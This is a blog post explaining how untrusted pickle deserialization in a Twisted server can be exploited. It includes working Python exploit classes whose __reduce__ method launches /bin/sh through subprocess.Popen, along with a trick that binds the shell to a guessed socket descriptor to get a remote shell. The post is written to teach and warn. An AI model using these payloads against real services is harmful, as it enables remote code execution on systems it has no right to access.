Exploiting misuse of Python's "pickle"

If you program in Python, you’re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you’re also familiar with the warning printed prominently near the start of pickle’s documentation:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Recently, however, I stumbled upon a project that was accepting and unpacking untrusted pickles over the network, and a poll of some friends revealed that few of them were aware of just how easy it is to exploit a service that does this. As such, this blog post will describe exactly how trivial it is to exploit such a service, using a simplified version of the code I recently encountered as an example. Nothing in here is novel, but it’s interesting if you haven’t seen it.

The Target

The vulnerable code was a Twisted server that listened over SSL. The code looked roughly like the following:

import base64
import cPickle

from twisted.internet import protocol

class VulnerableProtocol(protocol.Protocol):
  def dataReceived(self, data):
    # Code to actually parse incoming data according to an
    # internal state machine.
    # If we just finished receiving headers, call verifyAuth() to
    # check authentication.
    pass

  def verifyAuth(self, headers):
    try:
      token = cPickle.loads(base64.b64decode(headers['AuthToken']))
      if not check_hmac(token['signature'], token['data'], getSecretKey()):
        raise AuthenticationFailed
      self.secure_data = token['data']
    except:
      raise AuthenticationFailed

So, if we just send a request that looks something like:

AuthToken: <pickle here>

the server will happily unpickle it.
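
The ordering problem can be reproduced harmlessly. The following is a minimal Python 3 sketch, not the original server code: verify_auth, SECRET_KEY, and Probe are hypothetical stand-ins, pickle replaces cPickle, and a plain HMAC-SHA256 comparison is assumed in place of check_hmac. The "payload" only creates an empty directory in a temporary location, which is enough to show that something ran before the signature was ever checked.

```python
import base64
import hashlib
import hmac
import os
import pickle
import tempfile

SECRET_KEY = b"not-the-real-key"  # hypothetical; stands in for getSecretKey()


def verify_auth(header_value):
    """Mimic the vulnerable flow: unpickle first, check the signature second."""
    try:
        # Any callable embedded in the pickle runs on this line.
        token = pickle.loads(base64.b64decode(header_value))
        expected = hmac.new(SECRET_KEY, token["data"], hashlib.sha256).digest()
        return hmac.compare_digest(expected, token["signature"])
    except Exception:
        return False


class Probe:
    """Harmless stand-in for an exploit: unpickling it creates a directory."""

    def __init__(self, path):
        self.path = path

    def __reduce__(self):
        return (os.makedirs, (self.path,))


marker = os.path.join(tempfile.mkdtemp(), "unpickle-ran")
header = base64.b64encode(pickle.dumps(Probe(marker)))

accepted = verify_auth(header)
side_effect_happened = os.path.isdir(marker)
print("accepted:", accepted)
print("side effect happened:", side_effect_happened)
```

Authentication fails, as it should, but by then the directory already exists. The signature check never gets a chance to protect the unpickling step.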

Executing Code

So, what can we do with that? Well, pickle is supposed to allow us to represent arbitrary objects. An obvious target is Python’s subprocess.Popen objects – if we can trick the target into instantiating one of those, they’ll be executing arbitrary commands for us! To generate such a pickle, however, we can’t just create a Popen object and pickle it; for various mostly-obvious reasons, that won’t work. We could read up on the “pickle” format and construct a stream by hand, but it turns out there is no need to.

pickle allows arbitrary objects to declare how they should be pickled by defining a __reduce__ method, which should return either a string or a tuple describing how to reconstruct this object on unpickling. In the simplest form, that tuple should just contain:

A callable (which must be either a class, or satisfy some other, odder, constraints), and
A tuple of arguments to call that callable on.

pickle will pickle each of these pieces separately, and then on unpickling, will call the callable on the provided arguments to construct the new object.
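
To see the mechanism in isolation, here is a small harmless sketch in Python 3 (using pickle rather than cPickle). BecomesInt is a made-up class for illustration, and the callable is the built-in int rather than anything dangerous.

```python
import pickle


class BecomesInt:
    """Illustrative class: tells pickle to rebuild it by calling int("42")."""

    def __reduce__(self):
        # (callable, args): the unpickler will evaluate int("42").
        return (int, ("42",))


payload = pickle.dumps(BecomesInt())
restored = pickle.loads(payload)

# The unpickled value is whatever the callable returned, not a BecomesInt.
print(type(restored).__name__, restored)
```

Note that the class itself never appears in the pickle. Only the callable and its arguments are stored, so the receiving side does not need our class definition in order to run the call.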

And so, we can construct a pickle that, when un-pickled, will execute /bin/sh, as follows:

import cPickle
import subprocess
import base64

class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))

print base64.b64encode(cPickle.dumps(RunBinSh()))

Getting a Remote Shell

At this point, we’ve basically won. We can run arbitrary shell commands on the target, and there are any number of ways we could bootstrap from here up to an interactive shell and whatever else we might want.

For completeness, I’ll explain what I did, since it’s a moderately cute trick. subprocess.Popen lets us select which file descriptors to attach to stdin, stdout, and stderr for the new process by passing integers for the stdin and similarly-named arguments, so we can open our /bin/sh on arbitrarily-numbered fd’s.
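
A harmless way to convince yourself of this is to hand Popen one end of a pipe as a raw descriptor number. The sketch below is Python 3 and assumes a POSIX-like system; the pipe and the use of sys.executable as the child program are just demo scaffolding, not part of the exploit.

```python
import os
import subprocess
import sys


def run_with_fd_as_stdout():
    """Start a child whose stdout is a raw integer fd, and read what it wrote."""
    read_fd, write_fd = os.pipe()
    child = subprocess.Popen(
        [sys.executable, "-c", "print('hello from child')"],
        stdout=write_fd,  # a plain int, just like the fd used for the shell
    )
    os.close(write_fd)  # the parent keeps only the read end
    child.wait()
    with os.fdopen(read_fd, "rb") as reader:
        return reader.read()


output = run_with_fd_as_stdout()
print(output.decode().strip())
```

In the exploit the same thing happens, except that the integer refers to a network socket instead of a pipe, and it is passed for stdin and stderr as well.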

However, as mentioned above, the target server uses Twisted, and it serves all requests in the same thread, using an asynchronous event-driven model. This means we can’t necessarily predict which file descriptor on the server will correspond to our socket, since it depends on how many other clients are connected.

It also means, however, that every time we connect to the server, we’ll open a new socket inside the same server process. So, let’s guess that the server has fewer than, say, 20 concurrent connections at the moment. If we connect to the server’s socket 20 times, that will open 20 new file descriptors in the server. Since they’ll get assigned sequentially, one of them will almost certainly be fd 20. Then, we can generate a pickle like so, and send it over:
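
The "assigned sequentially" part relies on the POSIX rule that a new descriptor always gets the lowest number not currently in use. Here is a small Python 3 sketch of that behavior, using os.devnull as a stand-in for accepted sockets and assuming nothing else in the process is opening or closing files at the same time.

```python
import os


def open_descriptors(count):
    """Open `count` descriptors back to back and return their numbers."""
    return [os.open(os.devnull, os.O_RDONLY) for _ in range(count)]


fds = open_descriptors(5)
print("allocated:", fds)

# Free one slot in the middle; the next open() should reuse that number.
os.close(fds[2])
reused = os.open(os.devnull, os.O_RDONLY)
print("reused:", reused)

# Clean up everything that is still open.
for fd in fds[:2] + fds[3:] + [reused]:
    os.close(fd)
```

This is why flooding the server with connections works: whatever numbers were already taken, the new sockets fill the lowest free slots in order, so with enough connections one of them lands on the number we guessed.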

import cPickle
import subprocess
import base64

class Exploit(object):
  def __reduce__(self):
    fd = 20
    return (subprocess.Popen,
            (('/bin/sh',), # args
             0,            # bufsize
             None,         # executable
             fd, fd, fd    # std{in,out,err}
             ))

print base64.b64encode(cPickle.dumps(Exploit()))

We’ll open a /bin/sh on fd 20, which should be one of our 20 connections, and if all goes well, we’ll see a prompt printed to one of those. We’ll send some junk on that fd until we manage to get the original server to error out and close the connection, and we’ll be left talking to /bin/sh over a socket. Game over.

In Conclusion

Again, nothing here should be novel, nor would I expect any of these pieces to take a competent hacker more than a few minutes to figure out, given the problem. But if this blog post teaches someone not to use pickle on untrusted data, then it will be worth it.

Made of Bugs

It's software. It's made of bugs.
